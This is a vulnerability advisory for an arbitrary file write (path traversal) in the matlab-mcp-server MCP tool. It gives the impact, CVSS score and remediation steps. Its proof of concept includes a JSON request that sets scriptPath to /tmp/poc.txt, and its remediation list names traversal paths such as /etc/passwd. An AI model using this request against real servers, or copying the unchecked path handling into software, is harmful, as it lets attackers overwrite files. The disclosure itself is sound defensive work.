# Vulnerability Summary: Arbitrary File Write Vulnerability in matlab-mcp-server ## Vulnerability Overview * **Vulnerability Name**: Arbitrary File Write Vulnerability in matlab-mcp-server #18 * **Vulnerability ID**: CVE ID Request * **Vulnerability Type**: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) * **Discoverer**: Brucejs * **Report Date**: April 12, 2026 * **Affected Component**: `src/index.ts` * **Vulnerability Description**: In the `src/index.ts` file of `matlab-mcp-server`, the `generate_matlab_code` and `execute_matlab_code` tools accept a user-supplied `scriptPath` parameter and use it directly as the target for filesystem writes. The implementation lacks security checks such as validating against a base directory, rejecting absolute paths, or restricting parent directory traversal. An attacker can exploit the MCP interface to write content to arbitrary filesystem paths, leading to loss of integrity, configuration corruption, or further exploitation. ## Impact Scope * **Affected Versions**: Commit `ab88f606e95f36f725e8628029f7f66d0d9913ca` is confirmed to be affected. * **Security Impact**: * **Confidentiality**: Low (write-only primitive, not read). * **Integrity**: High (attackers can write to any writable filesystem location). * **Availability**: High (can corrupt application files, configuration files, startup scripts, etc.). * **CVSS v3.1 Score**: 9.4 (Critical) - Vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H` ## Remediation 1. **Eliminate Data Flow**: Eliminate the data flow from request to arbitrary file write as described in the documentation. 2. **Path Resolution and Validation**: Use `path.resolve` to resolve the `scriptPath` and compare it against a trusted base directory using path-aware boundary checks. 3. **Reject Absolute Paths**: Reject absolute paths unless explicitly whitelisted and located within the expected workspace. 4. **Remove Parameter**: If arbitrary output paths are not required, remove the `scriptPath` parameter and generate server-controlled filenames. 5. **Add Regression Tests**: Prove that paths such as `/tmp/poc.txt`, `/etc/passwd`, and `../../outside-workspace.txt` cannot be written via `generate_matlab_code` or `execute_matlab_code`. 6. **Publish Security Advisory**: Release a maintainer security advisory after the patch is published. ## POC Code and Exploitation Examples ### 1. Reproduction Steps Code ```bash cd matlab-mcp-server npm install npm run build npm run build npm run start ``` ### 2. Reproduction Request (JSON) ```json { "description": "POC_ARBITRARY_FILE_WRITE_TXT", "saveScript": true, "scriptPath": "/tmp/poc.txt" } ``` ### 3. Verification Result ```bash cat /tmp/poc.txt ``` ### 4. Generated Malicious File Content (`/tmp/poc.txt`) ```matlab % MATLAB code generated from description: POC_ARBITRARY_FILE_WRITE_TXT % Generated on: 2026-04-11T17:22:11.773Z % Your code here: % This is a placeholder implementation. % In a real system, this would be generated based on the description. function result = generatedFunction() % Based on description: POC_ARBITRARY_FILE_WRITE_TXT disp('Executing function based on description: POC_ARBITRARY_FILE_WRITE_TXT'); % Placeholder implementation result = 'Function executed successfully'; end % Call the function generatedFunction() ```